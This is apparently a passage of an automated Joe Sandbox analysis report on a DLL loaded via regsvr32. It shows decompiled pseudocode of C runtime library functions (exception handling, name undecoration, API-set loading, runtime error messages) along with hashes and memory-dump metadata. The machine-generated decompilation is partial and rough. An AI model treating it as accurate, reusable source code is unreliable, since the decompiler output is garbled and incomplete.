				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x80010645;
				r13d = r13d + 1;
				if (r13d == r15d) goto 0x800106eb;
				goto 0x800105fe;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E0000000118001021C(_t237, _t237,  *((intOrPtr*)(_t282 - 0x80)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				r13d = 0;
				r12d = r12d + 1;
				if (r12d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x80010599;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80010810;
				_t209 = _t280[8] - r13d;
				if (_t209 == 0) goto 0x8001072a;
				E0000000118000F1DC(_t282 - 8);
				if (_t209 != 0) goto 0x8001074b;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80010810;
				if (E0000000118000E8A0(_t280[9] >> 2, _t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80010810;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x80010866;
				if (_t280[8] == r13d) goto 0x80010770;
				E0000000118000F1DC(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x80010773;
				if (E00000001180012A90(_t235, _t237, _t237, _t305, _t281) != 0) goto 0x80010810;
				E0000000118000E96C(_t168, _t237,  *((intOrPtr*)(_t282 - 0x80)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t305;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t305;
				E0000000118000ED44( *((intOrPtr*)(_t282 - 0x80)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80010810;
				if (_t280[3] <= 0) goto 0x80010810;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x80010883;
				 *(_t284 + 0x38) = _t305;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180010D88(_t237, _t237,  *((intOrPtr*)(_t282 - 0x80)),  *(_t282 - 0x58) >> 0x20, _t281);
				_t173 = E0000000118000E0F4(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x80010883;
				return E000000011800028F0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

































                                                                                                              0x1800103d1
                                                                                                              0x1800103d6
                                                                                                              0x1800103dd
                                                                                                              0x1800103e4
                                                                                                              0x1800103e7
                                                                                                              0x1800103eb
                                                                                                              0x1800103f5
                                                                                                              0x1800103ff
                                                                                                              0x180010404
                                                                                                              0x180010407
                                                                                                              0x180010411
                                                                                                              0x180010418
                                                                                                              0x18001041d
                                                                                                              0x180010420
                                                                                                              0x180010425
                                                                                                              0x18001042b
                                                                                                              0x180010434
                                                                                                              0x180010440
                                                                                                              0x18001044a
                                                                                                              0x18001045b
                                                                                                              0x180010466
                                                                                                              0x18001046c
                                                                                                              0x180010476
                                                                                                              0x18001047c
                                                                                                              0x180010481
                                                                                                              0x180010485
                                                                                                              0x18001048e
                                                                                                              0x180010497
                                                                                                              0x18001049c
                                                                                                              0x1800104a7
                                                                                                              0x1800104ad
                                                                                                              0x1800104ba
                                                                                                              0x1800104c1
                                                                                                              0x1800104c7
                                                                                                              0x1800104d1
                                                                                                              0x1800104d3
                                                                                                              0x1800104dc
                                                                                                              0x1800104e7
                                                                                                              0x1800104f3
                                                                                                              0x1800104ff
                                                                                                              0x180010505
                                                                                                              0x180010513
                                                                                                              0x180010517
                                                                                                              0x180010521
                                                                                                              0x18001052b
                                                                                                              0x18001053c
                                                                                                              0x180010542
                                                                                                              0x180010549
                                                                                                              0x180010559
                                                                                                              0x180010564
                                                                                                              0x180010569
                                                                                                              0x18001056c
                                                                                                              0x180010571
                                                                                                              0x180010575
                                                                                                              0x18001057a
                                                                                                              0x18001057f
                                                                                                              0x180010586
                                                                                                              0x18001058c
                                                                                                              0x180010590
                                                                                                              0x180010594
                                                                                                              0x1800105a4
                                                                                                              0x1800105b3
                                                                                                              0x1800105bd
                                                                                                              0x1800105c0
                                                                                                              0x1800105c4
                                                                                                              0x1800105cb
                                                                                                              0x1800105d5
                                                                                                              0x1800105dc
                                                                                                              0x1800105e9
                                                                                                              0x1800105f1
                                                                                                              0x1800105f8
                                                                                                              0x180010605
                                                                                                              0x180010609
                                                                                                              0x180010611
                                                                                                              0x180010614
                                                                                                              0x180010625
                                                                                                              0x180010628
                                                                                                              0x18001062d
                                                                                                              0x18001063a
                                                                                                              0x18001063d
                                                                                                              0x180010643
                                                                                                              0x180010645
                                                                                                              0x180010660
                                                                                                              0x18001066b
                                                                                                              0x180010671
                                                                                                              0x180010677
                                                                                                              0x180010679
                                                                                                              0x18001067f
                                                                                                              0x180010681
                                                                                                              0x180010687
                                                                                                              0x18001068d
                                                                                                              0x1800106a7
                                                                                                              0x1800106af
                                                                                                              0x1800106b7
                                                                                                              0x1800106c2
                                                                                                              0x1800106ca
                                                                                                              0x1800106d3
                                                                                                              0x1800106dc
                                                                                                              0x1800106e1
                                                                                                              0x1800106e6
                                                                                                              0x1800106f0
                                                                                                              0x1800106f3
                                                                                                              0x1800106fa
                                                                                                              0x180010710
                                                                                                              0x180010716
                                                                                                              0x18001071a
                                                                                                              0x18001071c
                                                                                                              0x180010728
                                                                                                              0x180010732
                                                                                                              0x180010745
                                                                                                              0x180010753
                                                                                                              0x18001075d
                                                                                                              0x18001075f
                                                                                                              0x180010767
                                                                                                              0x18001076e
                                                                                                              0x18001077d
                                                                                                              0x180010790
                                                                                                              0x180010795
                                                                                                              0x1800107a6
                                                                                                              0x1800107aa
                                                                                                              0x1800107ad
                                                                                                              0x1800107b2
                                                                                                              0x1800107b7
                                                                                                              0x1800107bb
                                                                                                              0x1800107c2
                                                                                                              0x1800107c7
                                                                                                              0x1800107cc
                                                                                                              0x1800107d1
                                                                                                              0x1800107d7
                                                                                                              0x1800107e0
                                                                                                              0x1800107ef
                                                                                                              0x1800107f7
                                                                                                              0x1800107fe
                                                                                                              0x180010806
                                                                                                              0x18001080b
                                                                                                              0x180010810
                                                                                                              0x18001081a
                                                                                                              0x18001083b

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                              • String ID: csm$csm$csm
                                                                                                              • API String ID: 3606184308-393685449
                                                                                                              • Opcode ID: 83983e45d2570fdddc52d168bf20dd4954e8664624b439f344d92da66154f3ae
                                                                                                              • Instruction ID: f48904d0a2062b0254eb6c841efe487a34593a976f3a593cb0838b23e494017e
                                                                                                              • Opcode Fuzzy Hash: 83983e45d2570fdddc52d168bf20dd4954e8664624b439f344d92da66154f3ae
                                                                                                              • Instruction Fuzzy Hash: 28D1AF72604B888AEBA2DF65D4403DE37A0F7497D8F208115FE8957B9ACF74D299C740
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000AFFC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+
                                                                                                              • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                              • API String ID: 2943138195-2239912363
                                                                                                              • Opcode ID: 57498e1908925ba54620f78a8a842b5eb9505d122cc75619e9d288b6dde95e7c
                                                                                                              • Instruction ID: 7d4372cffa0d92e46b808f24c86e9dca5a601dd074ad7c68841e9c159a41594a
                                                                                                              • Opcode Fuzzy Hash: 57498e1908925ba54620f78a8a842b5eb9505d122cc75619e9d288b6dde95e7c
                                                                                                              • Instruction Fuzzy Hash: 03512D72A14B5898FB92CF64D8953ED77B0B74C788F84C125EB4963B95DF788288CB10
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003CFF0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$ErrorLast
                                                                                                              • String ID: W(
                                                                                                              • API String ID: 2506987500-612300789
                                                                                                              • Opcode ID: 2baf13e377c4e23e97929a1fce4123e6b703bb2814f9b3f1d73961cda4267355
                                                                                                              • Instruction ID: bc1816109030ffcba6a05e958861f3a4807aedcebaa0406cd8467394bf3409a6
                                                                                                              • Opcode Fuzzy Hash: 2baf13e377c4e23e97929a1fce4123e6b703bb2814f9b3f1d73961cda4267355
                                                                                                              • Instruction Fuzzy Hash: 1E21AE30300A4C41FAEFA735A6553FA5382AB8CBF0F12C716B976477D7DE29864A4301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000D490 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 30%
                                                                                                              			E0000000118000D490(void* __edx, long long __rbx, long long __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r12) {
				intOrPtr _t51;
				intOrPtr _t53;
				signed int _t60;
				signed int _t62;
				intOrPtr* _t82;
				char* _t83;
				char* _t85;
				char* _t86;
				char* _t87;
				signed long long _t88;
				char* _t89;
				long long* _t122;
				void* _t125;
				void* _t126;
				void* _t128;

				_t124 = __rsi;
				_t94 = __rbx;
				 *((long long*)(_t128 + 8)) = __rbx;
				 *((long long*)(_t128 + 0x10)) = __rdi;
				_t126 = _t128 - 0x57;
				_t129 = _t128 - 0x90;
				_t122 = __rcx;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(__rdx));
				_t51 =  *((intOrPtr*)(__rdx + 8));
				 *((intOrPtr*)(__rcx + 8)) = _t51;
				if (_t51 - 1 > 0) goto 0x8000d67f;
				_t82 =  *0x80071308; // 0x0
				 *(_t126 + 0xf) =  *(_t126 + 0xf) & 0x00000000;
				if ( *_t82 == 0) goto 0x8000d657;
				 *(_t126 - 9) =  *(_t126 - 9) & 0x00000000;
				_t10 = _t126 - 9; // 0x5ff7
				 *(_t126 - 1) =  *(_t126 - 1) & 0x00000000;
				_t13 = _t126 + 7; // 0x6007
				 *(_t126 + 7) =  *(_t126 + 7) & 0x00000000;
				_t16 = _t126 + 0x17; // 0x6017
				 *(_t129 + 0x20) =  *(_t128 - 0x90 + 0x20) & 0x00000000;
				r8d = 0;
				E0000000118000841C(__rbx, _t16, _t13, __rcx, __rsi, _t10);
				r8b = 0x20;
				0x80005f74(_t125);
				0x80005f48();
				 *((long long*)(__rcx)) =  *_t82;
				_t53 =  *((intOrPtr*)(_t82 + 8));
				 *((intOrPtr*)(__rcx + 8)) = _t53;
				if (_t53 - 1 > 0) goto 0x8000d67f;
				_t83 =  *0x80071308; // 0x0
				if ( *_t83 == 0x40) goto 0x8000d64b;
				 *(_t126 + 0xf) = 5;
				 *(_t126 + 7) = "{for ";
				_t26 = _t126 + 0x17; // 0x6017
				asm("movaps xmm0, [ebp+0x7]");
				asm("movdqa [ebp+0x17], xmm0");
				E00000001180006010("{for ", _t94, __rcx, _t26);
				_t85 =  *0x80071308; // 0x0
				if ( *(_t122 + 8) - 1 > 0) goto 0x8000d646;
				if ( *_t85 == 0) goto 0x8000d628;
				if ( *_t85 == 0x40) goto 0x8000d61e;
				_t28 = _t126 + 0x37; // 0x6037
				E0000000118000B5B8(_t94, _t28, _t122, _t124, __r12);
				 *(_t126 - 9) =  *(_t126 - 9) & 0x00000000;
				_t31 = _t126 - 9; // 0x5ff7
				 *(_t126 - 1) =  *(_t126 - 1) & 0x00000000;
				_t95 = _t85;
				E00000001180007320(0x60, _t85, _t85, _t31);
				0x80005f48();
				r8b = 0x27;
				0x80005f74();
				E00000001180006090( *(_t122 + 8), _t122, _t85, _t85);
				_t86 =  *0x80071308; // 0x0
				if ( *_t86 != 0x40) goto 0x8000d5e9;
				_t87 = _t86 + 1;
				 *0x80071308 = _t87;
				_t62 =  *(_t122 + 8);
				if (_t62 - 1 > 0) goto 0x8000d646;
				if ( *_t87 == 0x40) goto 0x8000d56d;
				_t88 = "s ";
				 *(_t126 + 0xf) = 2;
				 *(_t126 + 7) = _t88;
				_t41 = _t126 + 0x27; // 0x6027
				asm("movaps xmm0, [ebp+0x7]");
				asm("movdqa [ebp+0x27], xmm0");
				goto 0x8000d55b;
				if (_t62 - 1 > 0) goto 0x8000d646;
				if ( *_t88 != 0) goto 0x8000d635;
				E00000001180006244(1, _t88, _t122, _t41);
				E00000001180006144(0x7d, _t88, _t95, _t122);
				_t89 =  *0x80071308; // 0x0
				if ( *_t89 != 0x40) goto 0x8000d67f;
				 *0x80071308 = _t89 + 1;
				goto 0x8000d67f;
				 *(_t126 + 7) = 0x8005f780;
				0x80005f48();
				 *_t122 =  *(_t126 - 9);
				_t60 =  *(_t126 - 1);
				 *(_t122 + 8) = _t60;
				return _t60;
			}


















                                                                                                              0x18000d490
                                                                                                              0x18000d490
                                                                                                              0x18000d490
                                                                                                              0x18000d495
                                                                                                              0x18000d49b
                                                                                                              0x18000d4a0
                                                                                                              0x18000d4aa
                                                                                                              0x18000d4ad
                                                                                                              0x18000d4b0
                                                                                                              0x18000d4b3
                                                                                                              0x18000d4b8
                                                                                                              0x18000d4be
                                                                                                              0x18000d4c5
                                                                                                              0x18000d4cc
                                                                                                              0x18000d4d2
                                                                                                              0x18000d4d7
                                                                                                              0x18000d4db
                                                                                                              0x18000d4df
                                                                                                              0x18000d4e3
                                                                                                              0x18000d4e8
                                                                                                              0x18000d4ec
                                                                                                              0x18000d4f1
                                                                                                              0x18000d4f4
                                                                                                              0x18000d4f9
                                                                                                              0x18000d504
                                                                                                              0x18000d513
                                                                                                              0x18000d51b
                                                                                                              0x18000d51e
                                                                                                              0x18000d521
                                                                                                              0x18000d526
                                                                                                              0x18000d52c
                                                                                                              0x18000d536
                                                                                                              0x18000d543
                                                                                                              0x18000d54a
                                                                                                              0x18000d54e
                                                                                                              0x18000d552
                                                                                                              0x18000d556
                                                                                                              0x18000d55e
                                                                                                              0x18000d566
                                                                                                              0x18000d570
                                                                                                              0x18000d579
                                                                                                              0x18000d582
                                                                                                              0x18000d588
                                                                                                              0x18000d58c
                                                                                                              0x18000d591
                                                                                                              0x18000d596
                                                                                                              0x18000d59a
                                                                                                              0x18000d5a0
                                                                                                              0x18000d5a3
                                                                                                              0x18000d5b3
                                                                                                              0x18000d5b8
                                                                                                              0x18000d5c3
                                                                                                              0x18000d5ce
                                                                                                              0x18000d5d3
                                                                                                              0x18000d5dd
                                                                                                              0x18000d5df
                                                                                                              0x18000d5e2
                                                                                                              0x18000d5e9
                                                                                                              0x18000d5ef
                                                                                                              0x18000d5f4
                                                                                                              0x18000d5fa
                                                                                                              0x18000d601
                                                                                                              0x18000d608
                                                                                                              0x18000d60c
                                                                                                              0x18000d610
                                                                                                              0x18000d614
                                                                                                              0x18000d619
                                                                                                              0x18000d621
                                                                                                              0x18000d626
                                                                                                              0x18000d630
                                                                                                              0x18000d63a
                                                                                                              0x18000d63f
                                                                                                              0x18000d649
                                                                                                              0x18000d64e
                                                                                                              0x18000d655
                                                                                                              0x18000d665
                                                                                                              0x18000d66d
                                                                                                              0x18000d676
                                                                                                              0x18000d679
                                                                                                              0x18000d67c
                                                                                                              0x18000d696

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+$Name::operator+=
                                                                                                              • String ID: {for
                                                                                                              • API String ID: 179159573-864106941
                                                                                                              • Opcode ID: 49e5a9deee27bc709e145e00bf8a4ac405ad3ca45f043c294c427107788b0dc2
                                                                                                              • Instruction ID: 8b952993bc2072d49fe6a7282d269b813213c3ed4856af55e93548b82857096d
                                                                                                              • Opcode Fuzzy Hash: 49e5a9deee27bc709e145e00bf8a4ac405ad3ca45f043c294c427107788b0dc2
                                                                                                              • Instruction Fuzzy Hash: 39514972604B88A9EB92DF24D4813E933A1E349789F80C052FA4C4BB96DF79C798C710
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180046FF4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 53%
                                                                                                              			E00000001180046FF4(long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed long long _t41;
				intOrPtr _t45;
				signed long long _t46;
				signed long long _t66;
				long _t70;
				void* _t73;
				WCHAR* _t76;

				_t41 = _t66;
				 *((long long*)(_t41 + 8)) = __rbx;
				 *((long long*)(_t41 + 0x10)) = __rbp;
				 *((long long*)(_t41 + 0x18)) = __rsi;
				 *((long long*)(_t41 + 0x20)) = __rdi;
				if (__rdx == __r8) goto 0x800470d5;
				_t45 =  *((intOrPtr*)(0x180000000 + 0x71ef0 + __rsi * 8));
				if (_t45 == 0) goto 0x80047048;
				if (_t45 != 0xffffffff) goto 0x8004710f;
				goto 0x800470c8;
				r8d = 0x800;
				LoadLibraryExW(_t76, _t73, _t70);
				_t46 = _t41;
				if (_t41 != 0) goto 0x800470f6;
				if (GetLastError() != 0x57) goto 0x800470bc;
				_t12 = _t46 + 7; // 0x7
				r8d = _t12;
				if (E0000000118003C5E8(__r8) == 0) goto 0x800470bc;
				_t13 = _t46 + 7; // 0x7
				r8d = _t13;
				if (E0000000118003C5E8(__r8) == 0) goto 0x800470bc;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t41 != 0) goto 0x800470f6;
				 *((intOrPtr*)(0x180000000 + 0x71ef0 + __rsi * 8)) = _t41 | 0xffffffff;
				if (__rdx + 4 != __r8) goto 0x8004702a;
				return 0;
			}










                                                                                                              0x180046ff4
                                                                                                              0x180046ff7
                                                                                                              0x180046ffb
                                                                                                              0x180046fff
                                                                                                              0x180047003
                                                                                                              0x18004701d
                                                                                                              0x18004702c
                                                                                                              0x180047037
                                                                                                              0x18004703d
                                                                                                              0x180047043
                                                                                                              0x180047055
                                                                                                              0x18004705b
                                                                                                              0x180047061
                                                                                                              0x180047067
                                                                                                              0x180047076
                                                                                                              0x180047078
                                                                                                              0x180047078
                                                                                                              0x18004708d
                                                                                                              0x18004708f
                                                                                                              0x18004708f
                                                                                                              0x1800470a4
                                                                                                              0x1800470a6
                                                                                                              0x1800470ae
                                                                                                              0x1800470ba
                                                                                                              0x1800470c0
                                                                                                              0x1800470cf
                                                                                                              0x1800470f5

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                              • API String ID: 2559590344-537541572
                                                                                                              • Opcode ID: 33170cbb70bb6713f5e3991073c883806becb768ce094ee5d31b78fb3ee0fe7c
                                                                                                              • Instruction ID: 8604e60a5cdf88db9f886e92d9eae1edd4f6bd7978d36ae125add8b6f832c906
                                                                                                              • Opcode Fuzzy Hash: 33170cbb70bb6713f5e3991073c883806becb768ce094ee5d31b78fb3ee0fe7c
                                                                                                              • Instruction Fuzzy Hash: 1A31C031302F0891EAA3CB26A8403D963A5B70CBF4F098225FE2D437D1EF38D6498308
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001A9FC Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 475COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: f$p$p
                                                                                                              • API String ID: 3215553584-1995029353
                                                                                                              • Opcode ID: d9f5e7d9e1ec5bf5845b5bb8583a2d3c4251b6d6c38583b1b0281a15135c5e51
                                                                                                              • Instruction ID: e5ad5a1e6636a2dbec403dcb9a177e7928c1f891dc11f83372d7be6599820c36
                                                                                                              • Opcode Fuzzy Hash: d9f5e7d9e1ec5bf5845b5bb8583a2d3c4251b6d6c38583b1b0281a15135c5e51
                                                                                                              • Instruction Fuzzy Hash: 1712C53260898986FBA6AE54E0547EA7696F35D7D4F84C115F6D247AC8DF3CCB88CB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180057248 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 52%
                                                                                                              			E00000001180057248(void* __eax, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r9, void* __r11, long long _a8, long long _a16, long long _a24) {
				void* _t63;
				void* _t80;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				0x80059990();
				if (__eax == 1) goto 0x8005736f;
				if (__eax != 0) goto 0x80057289;
				if ( *0x800720f0 == 1) goto 0x8005736f;
				r14d = 0x314;
				if (E00000001180045614(__rax, 0x80072100, __rdx, L"Runtime Error!\n\nProgram: ") != 0) goto 0x80057390;
				 *0x8007233a = 0;
				r8d = 0x104;
				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0x800572f0;
				if (E00000001180045614(__rax, 0x80072132, 0x80072132, L"<program name unknown>") != 0) goto 0x80057390;
				if ( *0x480156396 != 0) goto 0x800572f4;
				if (0x180072133 - 0x3c <= 0) goto 0x80057330;
				r9d = 3;
				if (E0000000118004B224(0xffffffffffffffc5, __rcx, 0x1800720bc, _t63 - 0xffffffffffffffc5, __rsi, L"...", __r9) != 0) goto 0x80057390;
				if (E0000000118004AEA8(0xffffffffffffffc5, 0x80072100, _t80, L"\n\n") != 0) goto 0x80057390;
				if (E0000000118004AEA8(0xffffffffffffffc5, 0x80072100, _t80, __rcx) != 0) goto 0x80057390;
				r8d = 0x12010;
				0x80059c20();
				goto 0x80057377;
				return E000000011800571A0(_t80 - 0x19, __rcx, __rcx);
			}





                                                                                                              0x180057248
                                                                                                              0x18005724d
                                                                                                              0x180057252
                                                                                                              0x180057268
                                                                                                              0x180057270
                                                                                                              0x18005727a
                                                                                                              0x180057283
                                                                                                              0x180057289
                                                                                                              0x1800572aa
                                                                                                              0x1800572b7
                                                                                                              0x1800572c1
                                                                                                              0x1800572d5
                                                                                                              0x1800572ea
                                                                                                              0x1800572fc
                                                                                                              0x180057306
                                                                                                              0x18005730c
                                                                                                              0x18005732e
                                                                                                              0x180057344
                                                                                                              0x180057356
                                                                                                              0x180057358
                                                                                                              0x180057368
                                                                                                              0x18005736d
                                                                                                              0x18005738f

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
